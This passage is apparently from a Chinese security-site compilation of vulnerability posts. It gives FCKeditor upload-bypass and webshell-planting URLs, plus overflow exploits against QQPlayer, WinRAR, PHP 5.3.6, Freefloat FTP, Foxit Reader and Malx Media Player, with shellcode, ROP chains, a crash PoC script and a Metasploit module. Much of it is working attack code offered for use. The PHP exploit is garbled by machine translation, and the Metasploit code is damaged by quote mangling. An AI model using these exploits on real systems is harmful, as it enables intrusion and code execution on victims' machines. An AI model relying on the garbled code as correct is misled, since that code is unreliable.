不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
—————————————————————————————————————————————————————————————
5. 突破建立文件夹
FCKeditor V2.6.6
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor v2.4.3
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
—————————————————————————————————————————————————————————————
/wwwroot/userfiles/image/333.asp/2.asp;3.jpg
6. FCKeditor 中test 文件的上传地址
最新的 利用iis解析漏洞asp文件夹上存图片 或者是2.asp;jpg
FCKeditor v2.4.3
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
userfiles/file/1.asp;2(1).jpg
FCKeditor V2.6.6
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
—————————————————————————————————————————————————————————————
7.常用上传地址
FCKeditor v2.4.3
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor V2.6.6不能上传 不能建立
FCKeditor v2.4.3能上传 能建立
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
JSP 版:
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址,
—————————————————————————————————————————————————————————————
8.其他上传地址
全部存在
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
一般很多站点都已删除_samples 目录,可以试试。
FCKeditor V2.6.6(空白)
FCKeditor v2.4.3 存在
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
—————————————————————————————————————————————————————————————
9.列目录漏洞也可助找上传地址
Version 2.4.1 测试通过
修改CurrentFolder 参数使用 ../../来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
根据返回的XML 信息可以查看网站所有的目录。
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
也可以直接浏览盘符:
JSP 版本:
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
—————————————————————————————————————————————————————————————
10.爆路径漏洞
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
—————————————————————————————————————————————————————————————
11. FCKeditor 被动限制策略所导致的过滤不严问题
影响版本: FCKeditor x.x <= FCKeditor v2.4.3
脆弱描述:
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
而在apache 下,因为”Apache 文件名解析缺陷漏洞”也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!
—————————————————————————————————————————————————————————————
12.最古老的漏洞,Type文件没有限制!
我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本!
—————————————————————————————————————————————————————————————
篇8:溢出代码的补充说明及ptrace漏洞介绍
为了顺利的进行软件的开发和调试,在unix的早期版本里开始就提出了一种对运行中的进程进行跟踪和控制的方法,那就是系统调用ptrace,
溢出代码的补充说明及ptrace漏洞介绍
,
通过ptrace(),一个进程可以动态地读/写另一个进程地内存和寄存器,包括其指令空间、数据空间、堆栈以及所有的寄存器
篇9:QQPlayer asx文件处理缓冲区溢出漏洞漏洞预警
#################################################################
#
# Title: QQPlayer asx File Processing Buffer Overflow Exploit
# Author: Li Qingshan of Information Security Engineering Center,School of Software and Microelectronics,Peking University
# Vendor: www.qq.com
# Platform. Windows XPSP3 Chinese Simplified
# Test: QQPlayer 2.3.696.400
# Vulnerable: QQPlayer<=2.3.696.400p1
#
#################################################################
# Code :
head =''''''
junk = “A” * 1975
nseh =“x42x61x21x61”
seh =“xa9x9ex41x00”
adjust=“x30x83xc0x0c”
shellcode=(“PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV”
“QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL”
“KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9”
“QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW”
“TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R”
“HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA”)
junk_=“R”*8000
foot =''''''_playlis.wma“/>
''''''
payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot
fobj = open(”poc.asx“,”w“)
fobj.write(payload)
fobj.close
篇10:Foxit Reader Freetype Engine远程整数溢出漏洞漏洞预警
发布日期:-06-21
更新日期:2011-06-21
受影响系统:
Foxit Foxit Reader 4.x
Foxit Foxit Reader 3.x
Foxit Foxit Reader 2.x
不受影响系统:
Foxit Foxit Reader 4.0.0.0619
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 48359
CVE ID: CVE-2011-1908
Foxit Reader是一款小型的PDF文档查看器和打印程序,
Foxit Reader Freetype Engine远程整数溢出漏洞漏洞预警
,
Foxit Reader在Freetype引擎的实现上存在远程整数溢出漏洞,攻击者可利用此漏洞执行任意代码,可能会造成拒绝服务。
<*来源:David Seidman
链接:www.foxitsoftware.com/products/reader/security_bulletins.php#files
*>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Foxit
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
www.foxitsoft.com/wac/server_intro.php
篇11:WinRAR 7z压缩包处理溢出分析和利用漏洞预警
本文已经发表在《 防线》4月刊,作者及《 防线》保留版权,请注明原始出处。
适合读者:溢出爱好者
前置知识:汇编语言、缓冲区溢出基本原理
文/图 孤烟逐云(gyzy)【江苏大学信息安全系 & 邪恶八进制信息安全团队】
security.nnov.ru在底的时候发布了一个针对WinRAR 7z溢出的POC,可以导致执行恶意代码,可能有些朋友认为7z格式出问题不是那么严重,但WinRAR有个不算Bug的Bug:它是不认扩展名的,这意味着7z格式的压缩包扩展名改成rar还是能被解压,这就给恶意利用创造了机会,嘿嘿。WinRAR安装目录下的一个Formats的目录里面有许多扩展名是fmt的文件,但其实都是DLL,供主程序调用处理不同的压缩包。在7月份的时候LZH格式也出现过Stack Overflow,但这次的7z溢出严格的来说并不能称之为Stack overflow,看完漏洞的分析就知道为什么了。
既然已经有了poc,我们就没有必要自己去阅读大把的7z格式说明文档了,7z是开源的,在他的官方站点(www.7-zip.org)能下载到格式说明和一个开源的工程,感兴趣的朋友可以仔细研究下7z的文件格式。这里我直接给出作者在poc代码中公布的一个已经构造好的畸形压缩包:
”x37x7AxBCxAFx27x1Cx00x02“ //前8个字节是固定的
”xEExD6x49x23“ // 7z头部32字节的CRC1
”x00x00x00x00x00x00x00x00“ //下一个7z头的偏移,这里是0
”x2Dx40x00x00x00x00x00x00“ //下一个头的长度,这里是0x402D
”x3DxC3xFEx9B“ // 除前32字节外的CRC2
”x01x05x01x0Ex01x80x0Fx01x80x11x80x01x00“; //下一个头开始
char filename[0x400A]; //超长的文件名,Unicode编码
unsigned char hz_part2[] =
”x14x0Ax01x00xF0xDExE9xB5xBFxF2xC6x01x15x06x01x00“
”x20x00x00x00x00x00“; //文件属性等信息
这样,一个畸形的7z压缩包就构造好了,大家自己和图片对照一下,如图1
图1
不过先别急着打开,WinRAR会对7z压缩包进行CRC32校验,假如校验有错的话就会提示压缩包损坏。所以我们必须自己重新计算CRC校验值。所幸的是,czy大牛的博客上公布了一个计算7zCRC校验的程序,我在他的基础上略微更改了一下,在此表示感谢。假如大家为了练手要自己动手,那么有一点需要注意,由于第二个CRC值会间接影响到第一个CRC校验,所以必须首先计算第二个CRC校验值,CRC32的算法网上一抓一把,我就不多说了。我提供的7zCRC.exe默认校正当前目录下的test.rar,这一点也请注意,7zCRC.exe能在黑防网站上的配套代码里能找到。
小试牛刀
也许大家会奇怪为什么图1里面我文件名填充的为什么是重复的0x9960呢,答案就是Unicode,7z要求文件名必须是Unicode编码, 0x9960就是两个nop(0x90)的Unicode,对于Unicode我也不多解释,有一点需要牢记:0x80以上的会被转义,举个例子: 0x4100大家都知道是大写的A,但是0x9000就不是大家所熟悉的Nop了,依据语言环境的不同可能会被转义成乱码,正是这一点,给我们的完美利用带来了许多的麻烦。我们双击打开压缩包,然后要点解压到才能触发,WinRAR出错了,如图2:
图2
Offset:90909090 嘿嘿,EIP被覆盖了,接下来要做的就是定位溢出点,两次定位法,我还是不多说,自己翻以前的黑防。我直接给出结果,溢出点就在(filename+8)开始的四个字节,由于我们的Shellcode在栈中,习惯性的想到了中文/XP/2k3下通用的Jmp esp跳转地址0x7FFA4512,下面看我的代码:
char content[0x]; //0x400A/2 = 0x2005 用于ASCII向Unicode转换
memset(content,0x41,0x2005); //填充0x41不会引起转义问题
memcpy(content+4, ”x12x45xfax7f“,4); //
MultiByteToWideChar(CP_ACP,0,content,0x2005,(LPWSTR)filename,0x400A); //Convert
WriteFile(h7z, (LPCVOID)filename,0x400A,&dwWritten,NULL);
WinRAR 7z压缩包处理溢出分析和利用(图)
这时候栈的地址是在0x17Dxxxxx的地方,马上重新生成一个压缩包,打开,但出错的地址不在栈中,意味着EIP没有跳转到栈中,如图3:
图3
奇怪,3f是哪来的呢?经过我查资料,Unicode是双字节码,3f表示的是未知字符,文件名的16个字节经过 MultiByteToWideChar函数的转化以后已经变成了下面这个样子x41x00x41x00x41x00x41x00 x12x00x45x00x3fx00x41,看来这个地址是用不了了,poc代码的作者提供的是0x100201BB这个地址,这个地址是在7zxa.dll的.rdata段里,虽然这里面有个0xBB但是由于它处在首尾两端,我们还是可以给它补一个字节,这样就不怕转义了,但是在测试中我发现7z.fmt和7z.dll的加载基址几乎每次都是不一样的,所以这个地址也只能放弃,难道我们真的要放弃?
柳暗花明
我们的跳转地址必须符合三个条件:1.需要能够跳回堆栈 2.四个字节不能出现>0x80的字节 3.或者出现0x80以上的字节不能出现在中间两个位置上,
我打开OD的内存,一个个模块搜索过来,黄天不负有心人,在所有加载模块的最高处, Shell32.dll的.text段里面居然让我找到了:0x7D646981,嘿嘿,跳转地址就可以这么构造 0x41000x4100x4100x8A7C 0x69000x64000x7D00,其中是0x8A7C是0x81的Unicode,但这不是完美的解决方案,不是每台机子的0x7D646981都是Jmp esp,但同一个SP下Shell32.dll加载的基址应该是固定的,至于如何实现通用,这个问题还是留给读者吧。Shellcode的定位问题算是暂时告一段落了,紧接着而来的问题就是要有能经得起转换的Shellcode,对了,纯字母数字的Shellcode就是符合这样要求的 Shellcode,经得起MultiByteToWideChar折腾的也就这孩子了。幸亏黑防上期刚刚发表过关于编写纯字母数字的Shellcode 的文章,不然我得多打一个小时的字:)不知大家是否已经有了自己的AlphaNumric的Shellcode了,如果没有的话,我找来了一个生成的模板供大家使用:
{ ”eax“, ”PYIIIIIIIIIIIIIIII7QZ“ mixedcase_ascii_decoder_body },
{ ”ecx“, ”IIIIIIIIIIIIIIIII7QZ“ mixedcase_ascii_decoder_body },
{ ”edx“, ”JJJJJJJJJJJJJJJJJ7RY“ mixedcase_ascii_decoder_body },
{ ”ebx“, ”SYIIIIIIIIIIIIIIII7QZ“ mixedcase_ascii_decoder_body },
{ ”esp“, ”TYIIIIIIIIIIIIIIII7QZ“ mixedcase_ascii_decoder_body },
{ ”ebp“, ”UYIIIIIIIIIIIIIIII7QZ“ mixedcase_ascii_decoder_body },
{ ”esi“, ”VYIIIIIIIIIIIIIIII7QZ“ mixedcase_ascii_decoder_body },
{ ”edi“, ”WYIIIIIIIIIIIIIIII7QZ“ mixedcase_ascii_decoder_body },
{ ”[esp-10]“, ”LLLLLLLLLLLLLLLLYIIIIIIIIIQZ“ mixedcase_ascii_decoder_body },
{ ”[esp-C]“, ”LLLLLLLLLLLLYIIIIIIIIIIIQZ“ mixedcase_ascii_decoder_body },
{ ”[esp-8]“, ”LLLLLLLLYIIIIIIIIIIIIIQZ“ mixedcase_ascii_decoder_body },
{ ”[esp-4]“, ”LLLL7YIIIIIIIIIIIIII7QZ“ mixedcase_ascii_decoder_body },
{ ”[esp]“, ”YIIIIIIIIIIIIIIIIIQZ“ mixedcase_ascii_decoder_body },
{ ”[esp+4]“, ”YYIIIIIIIIIIIIIIII7QZ“ mixedcase_ascii_decoder_body },
{ ”[esp+8]“, ”YYYIIIIIIIIIIIIIIIIQZ“ mixedcase_ascii_decoder_body },
{ ”[esp+C]“, ”YYYYIIIIIIIIIIIIIII7QZ“ mixedcase_ascii_decoder_body },
{ ”[esp+10]“, ”YYYYYIIIIIIIIIIIIIIIQZ“ mixedcase_ascii_decoder_body },
{ ”[esp+14]“, ”YYYYYYIIIIIIIIIIIIII7QZ“ mixedcase_ascii_decoder_body },
{ ”[esp+18]“, ”YYYYYYYIIIIIIIIIIIIIIQZ“ mixedcase_ascii_decoder_body },
{ ”[esp+1C]“, ”YYYYYYYYIIIIIIIIIIIII7QZ“ mixedcase_ascii_decoder_body },
{ ”seh“, mixedcase_w32sehgetpc ”IIIIIIIIIIIIIIIII7QZ“ // ecx code
这是解码头,根据溢出的时候哪个寄存器指向Shellcode进行选用,生成Shellcode主体的函数配套代码alphashellcode里面有。我们这应该选择TYIIIIIIIIIIIIIIII7QZ这个解码头,Shellcode怪长的我就不贴了,以免有骗稿费之嫌。再次测试,成功,如图 4:
图4
疑云重重
虽然利用是成功了,不过不知道大家有没有发现一些比较奇怪的问题:1.如果是栈溢出,为什么溢出点却在超长字符串的前面,而不是在中间或者后面,不会它的缓冲区只有1个字节吧? 2.为什么打开的时候不触发漏洞只有解压的时候才触发? 3.为什么gyzy说这不是严格意义上的栈溢出?(汗..) 带着这一连串的问题,任何言语的猜测都是苍白的,还是让OD去解开我们的疑团。这里顺便发一下牢骚,OD对多线程的处理真是不咋的,经常会莫名其妙的出现假死的现象,先加载WinRAR.exe让OD跑起来,记得先把跳转地址改掉,以免出现没有断下来的尴尬局面,另外还要记得校正CRC值,不然它会郑重的警告你一下,哈哈,祈祷你的机器没有假死吧,阿门,如图5:
图5
我发现原版的OD好像稳定性好一点,所以我用的是原版的,这个时候EIP已经被覆盖了,我在堆栈窗口里往上下都翻了翻,没有翻到正常的返回地址,奇怪了,不可能所有的返回地址都覆盖吧?太狠了,居然一点线索都不给留下,按照常规堆栈回溯下很容易找到出问题的代码,看来事情越发的扑朔迷离了。 Ctrl+F2重新来,F9让他跑起来,然后bp CreateThread,
篇12:PHP 5.3.6缓冲区溢出POC(ROP)的CVE漏洞预警
<?PHP
/ *
** xiaolandjj@qq.com
** bbs.xxoxo.org
** 7月15日
**基于堆栈的缓冲区溢出,在ext /插座/ sockets.c socket_connect功能
在PHP 5.3.3到5.3.6可能依赖于上下文的攻击者执行任意
**代码通过UNIX套接字的路径名,
**由:小兰
* /
回声“[+] PHP 5.3.6缓冲区溢出的POC(ROP)的 N”;
回声“[+] CVE - - 1938 N N”;
#/ usr / bin中/ PHP的小工具
定义(“哑”,“ X42 X42 X42 X42”); / /填充
定义(“栈”,“ X20 XBA X74 X08”); / /数据0x46a0 0x874ba20
定义(“STACK4”,“中 X24 XBA X74 X08”); / / STACK + 4
定义(“STACK8”,“ X28 XBA X74 X08”); / /栈+ 8
定义(“STACK12”,“ x3c XBA X74 X08”); / /栈+ 12
定义(INT_80“,” X27 xb6 X07 X08“); / / 0x0807b627:INT 0x80的
定义(“INC_EAX”,“ X66 X50 X08 x0f”); / / 0x080f5066:INC%eax中| RET
定义(“XOR_EAX',” X60 XB4 X09 X08“); / / 0x0809b460:XOR EAX%,%eax中| RET
定义(“MOV_A_D”,“ X84 x3e X12 X08”); / / 0x08123e84:MOV EAX%,(%edx中)| RET
定义(“POP_EBP”,“ xc7 X48 X06 X08”); / / 0x080648c7:弹出%EBP | RET
定义(“MOV_B_A',” X18 X45 X06 X08“); / / 0x08064518:MOV的%ebp,%eax中|弹出%EBX |弹出%ESI |弹出%EDI |弹出%EBP | RET
定义(“MOV_DI_DX',” X20 X26 X07 X08“); / / 0x08072620:MOV%EDI,%edx中|弹出%ESI |弹出%EDI |弹出%EBP | RET
定义(“POP_EDI”,“ X23 X26 X07 X08”); / / 0x08072623:弹出%EDI |弹出%EBP | RET
定义(“POP_EBX”,“ x0f x4d X21 X08”); / / 0x08214d0f:弹出%EBX |弹出%ESI |弹出%EDI |弹出%EBP | RET
定义(“XOR_ECX”,“ XE3 X3B x1f X08”); / / 0x081f3be3:XOR%ECX,%ecx中|弹出%EBX | MOV ECX%,%eax中|弹出%ESI |弹出%EDI |弹出% EBP | RET
美元padd = str_repeat(“A”,196);
为有效载荷= POP_EDI,
/ /弹出%EDI
堆栈。/ / 0x874ba20
假人。/ /弹出的%ebp
MOV_DI_DX。%/ / MOV EDI,EDX%
假人。/ /弹出%ESI
假人。/ /弹出%EDI
“/ / BI”。/ /弹出的%ebp
MOV_B_A。/ / MOV的%ebp,%eax中
假人。/ /弹出%ebx中
假人。/ /弹出%ESI
假人。/ /弹出%EDI
假人。/ /弹出的%ebp
MOV_A_D。%/ / MOV EAX,(%edx中)
POP_EDI。/ /弹出%EDI
STACK4。/ / 0x874ba24
假人。/ /弹出的%ebp
MOV_DI_DX。%/ / MOV EDI,EDX%
假人。/ /弹出%ESI
假人。/ /弹出%EDI
“N / sh”的。/ /弹出的%ebp
MOV_B_A。/ / MOV的%ebp,%eax中
假人。/ /弹出%ebx中
假人。/ /弹出%ESI
假人。/ /弹出%EDI
假人。/ /弹出的%ebp
MOV_A_D。%/ / MOV EAX,(%edx中)
POP_EDI。/ /弹出%EDI
STACK8。/ / 0x874ba28
假人。/ /弹出的%ebp
MOV_DI_DX。%/ / MOV EDI,EDX%
假人。/ /弹出%ESI
假人。/ /弹出%EDI
假人。/ /弹出的%ebp
XOR_EAX。%/ / XOR EAX,%eax中
MOV_A_D。%/ / MOV EAX,(%edx中)
XOR_ECX。/ / XOR%,ECX,ECX%
假人。/ /弹出%ebx中
假人。/ /弹出%ESI
假人。/ /弹出%EDI
假人。/ /弹出的%ebp
POP_EBX。/ /弹出%ebx中
堆栈。/ / 0x874ba20
假人。/ /弹出%ESI
假人。/ /弹出%EDI
假人。/ /弹出的%ebp
XOR_EAX。%/ / XOR EAX,%eax中
INC_EAX。/ / INC EAX%
INC_EAX。/ / INC EAX%
INC_EAX。/ / INC EAX%
INC_EAX。/ / INC EAX%
INC_EAX。/ / INC EAX%
INC_EAX。/ / INC EAX%
INC_EAX。/ / INC EAX%
INC_EAX。/ / INC EAX%
INC_EAX。/ / INC EAX%
INC_EAX。/ / INC EAX%
INC_EAX。/ / INC EAX%
INT_80; / / INT 0x80的美元
邪恶= $ padd美元的有效载荷。
$ FD = socket_create(AF_UNIX,SOCK_STREAM,1);
$ RET = socket_connect(FD,邪恶美元);
?>
篇13:VLC Media Player HTML副标题解析缓冲区溢出漏洞漏洞预警
受影响系统:
VideoLAN VLC Media Player 2.x
描述:
VLC Media Player是多媒体播放器,
VLC Media Player modules/codec/subsdec.c 在解析的HTML副标题时存在错误,攻击者通过精心构造的副标题可造成缓冲区溢出,从而执行任意代码,
<*来源:vendor
链接:secunia.com/advisories/51692/
www.videolan.org/news.html
*>
建议:
厂商补丁:
VideoLAN
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
www.videolan.org/
篇14:Freefloat FTP Server多个命令远程缓冲区溢出漏洞漏洞预警
发布日期:-08-05
更新日期:2011-08-05
受影响系统:
Freefloat Freefloat FTP Server 1.00
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 49052
Freefloat FTP Server是免费的用于上传文件和管理有线及无线设备的软件,
Freefloat FTP Server在多个命令的处理上存在远程缓冲区溢出漏洞,远程攻击者可利用这些漏洞在受影响应用程序中执行任意代码,也可能会造成拒绝服务。
<*来源:Veerendra G.G
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
49052.py
#!/usr/bin/python
##############################################################################
# Title : Freefloat FTP Server Multiple Buffer Overflow Vulnerabilities
# Author : Veerendra G.G from SecPod Technologies (www.secpod.com)
# Vendor : www.freefloat.com/sv/utilities-tools/utilities-tools.php
# Advisory : secpod.org/blog/?p=310
# secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py
# secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt
# Version : Freefloat FTP Server Version 1.0
# Date : 21/07/2011
##############################################################################
import sys, socket
def exploit(HOST, PORT, CMD):
try:
tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_sock.connect((HOST, PORT))
except Exception, msg:
print ”[-] Not able to connect to : “ , HOST
sys.exit(0)
res = tcp_sock.recv(1024)
if ”220 FreeFloat“ not in res:
print ”[-] FreeFloat FTP Server Not Found...“
tcp_sock.close
sys.exit(0)
tcp_sock.send(”USER testrn“)
tcp_sock.recv(1024)
tcp_sock.send(”PASS testrn“)
tcp_sock.recv(1024)
tcp_sock.send(CMD + ” “+ ”A“ * 1000 + ”rn“)
tcp_sock.close()
if __name__ == ”__main__“:
if len(sys.argv) < 2:
print ”t[-] Usage: python exploit.py target_ip“
print ”t[-] Example : python exploit.py 127.0.0.1“
print ”t[-] Exiting...“
sys.exit(0)
HOST = sys.argv[1]
PORT = 21
## Vulnerable Commands
CMDs = [”DELE“, ”MDTM“, ”RETR“, ”RMD“, ”RNFR“,
”RNTO“, ”STOU“, ”STOR“, ”SIZE“, ”APPE“, ”STAT“]
for CMD in CMDs:
print ”[+] Connecting with server...“
exploit(HOST, PORT, CMD)
print ”[+] Exploit Sent with %s command...“ %(CMD)
print ”[+] Checking Server Crashed or not...“
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.close()
except Exception, msg:
print ”[+] Server Crashed with %s Command“ %(CMD)
sys.exit(0)
建议:
--------------------------------------------------------------------------------
厂商补丁:
Freefloat
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
www.freefloat.com/
篇15:福昕PDF阅读器v4.1.1标题堆栈缓冲区溢出漏洞预警
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::PDF
include Msf::Exploit::Egghunter
#include Msf::Exploit::Seh # unused due to special circumstances
def initialize(info = {})
super(update_info(info,
'Name' => 'Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Foxit PDF Reader prior to version
4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that
contains an overly long string in the Title field. This results in overwriting a
structured exception handler record.
NOTE: This exploit does not use javascript.
},
'License' => MSF_LICENSE,
'Version' => ”$Revision: 11096 $“,
'Author' =>
[
'dookie', # Discovered the bug
'Sud0', # Original exploit (from Offsec Exploit Weekend)
'corelanc0d3r', # Metasploit exploit
'jduck' # Metasploit-fu
],
'References' =>
[
#[ 'CVE', '' ],
[ 'OSVDB', '68648' ],
[ 'URL', 'www.exploit-db.com/exploits/15532' ],
[ 'URL', 'www.corelan.be:8800/index.php//11/13/offensive-security-exploit-weekend/' ]
],
'Payload' =>
{
'BadChars' => ”x00x01x02x03x04x05x06x07x08x09x0ax0dx2Fx5cx3cx3ex5ex7e“,
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'EDI', # egghunter jmp edi
}
},
'Platform' => 'win',
'Targets' =>
[
[ 'Foxit Reader v4.1.1 XP Universal', { 'Offset' => 540, 'Ret' => ”x4Bx6A“ } ] #unicode p/p/r foxit reader.exe
],
'DisclosureDate' => 'Nov 13 2010',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The output filename.', 'corelan_foxit.pdf']),
OptString.new('OUTPUTPATH', [ false, 'The location to output the file.', './data/exploits/'])
], self.class)
end
def exploit
@label = rand_text_alpha(7)
nseh = ”x5Ax41“ # pop edx -- to make edx writable
seh = target['Ret']
# inc ecx / pop esp / popad / push esp / ret
align = ”x41x61x5Cx5Cx41x61x41x54x41xC3“
ecx_control = ”xB3x30xB3“ # becomes ecx
hunter, @egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
# Encode with alphamixed, then unicode mixed
[ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|
enc = framework.encoders.create(name)
if name =~ /unicode/
enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
else
enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })
end
# NOTE: we already eliminated badchars
hunter = enc.encode(hunter, nil, nil, platform)
if name =~/alpha/
#insert getpc_stub & align EDX, unicode encoder friendly.
#Hardcoded stub is not an issue here because it gets encoded anyway
getpc_stub = ”x89xe1xdbxccxd9x71xf4x5ax83xc2x41x83xeax35“
hunter = getpc_stub + hunter
end
}
#tweak hunter, patched to make it write to ECX
hunter[1] = ”a“
doctitles = [
”Confidential : Contract + Terms of Use“,
”Contract information“,
”Acquisition contract“,
”...loading, please wait...“,
”Trademark, patent and copyright information“,
”Limited Liability Partnership“,
”Partnership agreement“,
”Last will and testament“,
”How to hack gmail“,
”Running Metasploit on Windows Mobile“,
”Free torrent sites“,
”Lady Gaga naked“,
”Free Shopping vouchers“
]
sploit = ''
sploit << doctitles[rand(doctitles.length)]
sploit << ” “ * (target['Offset'] - sploit.length)
sploit << nseh << seh
sploit << align
sploit << ecx_control
sploit << hunter
file_create(make_pdf(sploit))
end
# Override the mixin obfuscator since it doesn't seem to work here.
def nObfu(str)
return str
end
def trailer(root_obj)
ret = 'trailer'
ret << nObfu(”<<< ioRef(root_obj)
ret << nObfu(“/Info ”) << ioRef(5)
ret << nObfu(“/#{@label} #{@egg}”)
ret << nObfu(“>>”)
ret << eol
ret
end
def make_pdf(sploit)
@pdf << header('1.4')
add_object(1, nObfu(“>”))
add_object(2, nObfu(“”))add_object(3, nObfu(“<<< ioRef(4) << nObfu(”]>>“))
add_object(4, nObfu(”<<< ioRef(3) << nObfu(“/MediaBox[0 0 612 792]>>”))
add_object(5, nObfu(“”))
finish_pdf
end
篇16:Malx Media Player处理畸形m3u文件栈溢出本地任意代码执行漏洞预警
Malx Media Player 3.2.2 处理畸形m3u文件时会发生栈溢出,从而可以让攻击者成功控制EIP,执行任意代码,(Win7 SP1配合MacType进行ROP)
Malx Media Player使用MAX_PATH作为参数初始化栈上变量,但是使用vfscanf时并没有考虑输入长度,导致栈溢出。 软件地址:malx-media-player.software.informer.com/
构建一个畸形M3U文件,然后载入程序,喜闻乐见的崩溃,kvn回溯栈调用发现它是从vfscanf进去的,看来一定是用了MAX_PATH了,再试一下它是从哪块函数调用上vfscanf的:
0:000> bp msvcrt!vfscanf
0:000> bl
0 e 76cf574d 0001 (0001) 0:**** msvcrt!vfscanf
1 eu 0001 (0001) (msvcrf!fscanf)
0:000> g
Breakpoint 0 hit
eax=0018f92c ebx=0018fb64 ecx=76c9a6db edx=0008e381 esi=76d22960 edi=76cf58b9
eip=76cf574d esp=0018f904 ebp=0018f91c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
msvcrt!vfscanf:
76cf574d 6a0cpush 0Ch
gu两次,看到是从image00400000+0x46f0这儿进去的:
0:000> gu
eax=00000001 ebx=0018fb64 ecx=76cf587e edx=76d22960 esi=76d22960 edi=76cf58b9
eip=76cf58d4 esp=0018f908 ebp=0018f91c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
